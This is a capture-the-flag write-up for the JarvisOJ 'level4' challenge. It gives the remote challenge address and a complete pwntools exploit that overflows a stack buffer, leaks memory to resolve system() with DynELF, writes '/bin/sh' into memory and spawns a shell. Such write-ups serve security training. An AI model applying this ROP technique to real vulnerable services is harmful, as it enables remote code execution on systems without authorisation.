[XMAN]level4

nc pwn2.jarvisoj.com 9880

 



level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0

 

无libc,使用DynELF

exp如下:

from pwn import *

def leak(address):
    """Read and return 4 bytes of the target process at *address*.

    Used as the leak callback for ``DynELF``: the 140-byte padding fills the
    stack frame up to the saved return address, after which the return
    address is replaced by a call whose arguments are (1, address, 4) —
    presumably a write-to-stdout of 4 bytes at *address* (the called
    address 0x8048340 is not resolved on this page; verify against the
    binary's PLT).  0x804844B is the address execution continues at after
    that call; presumably it re-enters the vulnerable function so the
    next leak can be performed (confirm in the binary).

    Returns whatever ``io.recv(4)`` hands back (up to 4 bytes); it does
    not retry a short read.
    """
    call_target = 0x8048340
    after_call = 0x804844B
    frame = [call_target, after_call, 1, address, 4]
    chain = b''.join(p32(word) for word in frame)
    io.send(b'a' * 140 + chain)
    return io.recv(4)

# Alternative targets kept for local testing: a plain local process, or one
# under gdb with a breakpoint at 0x804844B (the address every chain below
# returns to after its call).
#io = process('./level4')
#io = gdb.debug('./level4', 'b *0x804844B')
io = remote("pwn2.jarvisoj.com", 9880)
# No libc is available (see the note above), so the address of system() is
# resolved by DynELF, which repeatedly calls leak() to read remote memory.
d = DynELF(leak, elf = ELF("./level4"))
system_addr = d.lookup("system", "libc")
info("system_addr:" + str(hex(system_addr)))
# Second chain: call with arguments (0, 0x804A100, 8), i.e. an 8-byte read
# from stdin into 0x804A100 — presumably read@plt and a writable .bss/.data
# address; confirm both against the binary.
payload = b'a' * 140 + p32(0x8048310) + p32(0x804844B) + p32(0) + p32(0x804A100) + p32(8)
io.send(payload)
# The sleeps separate consecutive sends so the remote side consumes each
# one in turn; the script does not wait for any response in between.
sleep(0.5)
# Exactly 8 bytes, matching the length passed in the chain above.
io.send(b'/bin/sh\0')
# Third chain: call system(0x804A100), i.e. on the string just written.
# The return-address slot after system_addr is again 0x804844B.
payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(0x804A100)
sleep(0.5)
io.send(payload)

io.interactive()

 
